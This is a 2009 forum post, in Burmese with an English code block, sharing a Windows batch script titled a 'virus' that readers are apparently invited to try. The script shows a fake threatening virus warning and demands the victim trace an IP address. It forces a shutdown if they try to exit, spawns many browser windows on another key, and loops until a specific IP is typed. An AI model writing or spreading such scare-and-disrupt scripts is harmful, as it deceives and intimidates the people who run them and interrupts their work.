1 batch Virus 14th May 2009, 12:37 am
sHa92
Founder
ဒါေလးကိုလည္း စမ္းၾကည့္လိုက္ပါ
ၾကိဳက္သြားပါလိမ့္မယ္
ၾကိဳက္သြားပါလိမ့္မယ္
- Code:
@echo off
color 0c
:start
echo Key:
echo.
echo --------------------------------------------------------------
echo.
echo YOU HAVE A VIRUS DO NOT ATTEMPT TO EXIT IF YOU DO THERE WILL BE SEVERE PUNISHMENTS
echo FOLLOW DIRECTIONS OR ELSE
echo 1. You have to find the ip address of [You must be registered and logged in to see this link.]
echo 2. to do that Press "t"
echo 3. if you follow these direction nothing will happen!!!!!!!
echo 4. good luck!!!!!!!!!!!
echo.
echo --------------------------------------------------------------
echo Press "e" to exit.
echo Press "g" to ?????????????????????
echo.
echo --------------------------------------------------------------
echo.
echo DONT EXIT OR ELSE!!!!!!!!!!!!!!!!!!!!!
set /p input=
if %input%==t start tracert [You must be registered and logged in to see this link.]
if %input%==e start shutdown -s -t 10 -c" I TOLD YOU YOU SHOULDENT HAVE EXITED"
if %input%==g start iexplore [You must be registered and logged in to see this link.]
if %input%==g start iexplore [You must be registered and logged in to see this link.]
if %input%==g start iexplore [You must be registered and logged in to see this link.]
if %input%==g start iexplore [You must be registered and logged in to see this link.]
if %input%==g start iexplore [You must be registered and logged in to see this link.]
if %input%==g start iexplore [You must be registered and logged in to see this link.]
if %input%==g start iexplore [You must be registered and logged in to see this link.]
if %input%==g start iexplore [You must be registered and logged in to see this link.]
if %input%==g start iexplore [You must be registered and logged in to see this link.]
if %input%==g start iexplore [You must be registered and logged in to see this link.]
if %input%==g start iexplore [You must be registered and logged in to see this link.]
if %input%==g start iexplore [You must be registered and logged in to see this link.]
if %input%==g start iexplore [You must be registered and logged in to see this link.]
if %input%==g start iexplore [You must be registered and logged in to see this link.]
if %input%==g start iexplore [You must be registered and logged in to see this link.]
echo ---------------------------------------------------------------
echo Well you traced the ip address right???????, now what is it or
maybe you hit random buttons well next that wont work!!!!!!!!!!!!!
set /p input=
if %input%==209.85.171.100 goto :continue
if %input%==%input% goto :start
echo -----------------------------------------------------------
:continue
echo thanks for playing
echo Made By $ƴǩǾ, Original Design goes to Mason.
pause
exit